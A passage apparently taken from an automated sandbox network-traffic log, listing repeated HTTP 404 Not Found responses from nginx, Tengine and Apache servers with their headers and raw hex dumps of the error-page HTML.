6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 23:19:49 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 23:19:52 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 23:19:55 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
